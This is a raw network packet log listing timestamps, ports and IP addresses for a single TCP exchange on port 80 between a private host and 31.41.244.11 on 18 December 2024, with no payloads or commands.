Dec 18, 2024 13:38:34.983521938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.984507084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.984565020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.984637976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.984695911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.985397100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.985450983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.985627890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.985672951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.986499071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.986521006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.986555099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.986576080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.987531900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.987591028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.987627029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.987679958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.988578081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.988639116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.988676071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.988719940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.989717007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.989733934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.989780903 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.990664005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.990719080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.990780115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.990828991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.991715908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.991763115 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.991807938 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.991859913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.992777109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.992840052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.992997885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.993046999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.993880987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.993964911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.993997097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.994895935 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.994908094 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.994944096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.994987011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.995023012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:34.995946884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:34.996108055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.132494926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.132610083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.132694006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.132754087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.133024931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.133080006 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.133156061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.133198023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.134280920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.134365082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.134418964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.135184050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.135241032 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.135291100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.135346889 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.136322975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.136334896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.136377096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.137317896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.137367010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.137451887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.137495995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.138314009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.138362885 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.138448954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.138490915 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.139394045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.139446020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.139522076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.139574051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.140470982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.140521049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.140579939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.140628099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.141515017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.141565084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.141629934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.141675949 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.142612934 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.142666101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.142807961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.142854929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.143759012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.143805981 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.143846989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.143893003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.144963980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.145011902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.145271063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.145322084 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.146516085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.146565914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.146639109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.146687031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.147290945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.147339106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.147368908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.147418022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.147979021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.148027897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.148032904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.148071051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.149101973 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.149163961 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.149172068 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.149218082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.150144100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.150193930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.150245905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.150291920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.151103020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.151151896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.151210070 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.151257038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.152214050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.152226925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.152268887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.153438091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.153489113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.153521061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.153573036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.154376984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.154426098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.154640913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.154685974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.155334949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.155383110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.155419111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.155464888 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.156387091 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.156433105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.156594992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.156642914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.157485962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.157535076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.157613993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.157663107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.158677101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.158729076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.158895969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.158943892 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.159550905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.159599066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.159677982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.159725904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.160614014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.160664082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.160909891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.160960913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.161684990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.161734104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.161941051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.161983013 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.162731886 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.162779093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.162848949 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.162894964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.163918018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.163966894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.164254904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.164304018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.164904118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.164952993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.165018082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.165064096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.165987968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.166038990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.166094065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.166141033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.167057037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.167107105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.167135954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.167184114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.168055058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.168106079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.168138981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.168188095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.169086933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.169164896 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.169197083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.169245958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.170195103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.170253992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.170284033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.170334101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.171288967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.171334028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.171405077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.171452999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.172348022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.172399044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.172509909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.172558069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.173338890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.173383951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.173418999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.173466921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.174496889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.174532890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.174552917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.174578905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.175609112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.175658941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.175738096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.175786018 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.176516056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.176562071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.176629066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.176676035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.177961111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.177974939 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.178014994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.178735971 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.178788900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.178867102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.178913116 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.179704905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.179758072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.179882050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.179929972 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.180891037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.180938959 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.180972099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.181168079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.181886911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.181935072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.181946993 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.181993961 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.182950020 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.183003902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.183094025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.183141947 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.183990955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.184040070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.184102058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.184150934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.185034990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.185090065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.185288906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.185340881 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.186228037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.186276913 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.186353922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.186403990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.187158108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.187206030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.187269926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.187334061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.188456059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.188507080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.324702978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.324762106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.324843884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.325220108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.325272083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.325334072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.325376034 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.326282978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.326328039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.326345921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.326404095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.327485085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.327545881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.327600002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.328370094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.328450918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.328494072 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.329395056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.329448938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.329478979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.329515934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.330533028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.330575943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.330605984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.330660105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.331655025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.331669092 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.331708908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.332623005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.332663059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.332768917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.332806110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.333755016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.333794117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.333823919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.333863020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.334733963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.334832907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.334866047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.334882021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.335884094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.335897923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.335939884 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.336831093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.336879969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.336937904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.336977005 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.337925911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.337985039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.338043928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.338085890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.339072943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.339085102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.339132071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.340028048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.340070963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.340101957 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.340148926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.341142893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.341197968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.341296911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.341340065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.342207909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.342257023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.342287064 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.342327118 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.343214035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.343256950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.343357086 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.343401909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.344247103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.344312906 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.344373941 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.344417095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.345318079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.345370054 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.345421076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.345755100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.346590996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.346646070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.346709013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.346868038 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:35.347668886 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:35.347719908 CET	49715	80	192.168.2.8	31.41.244.11
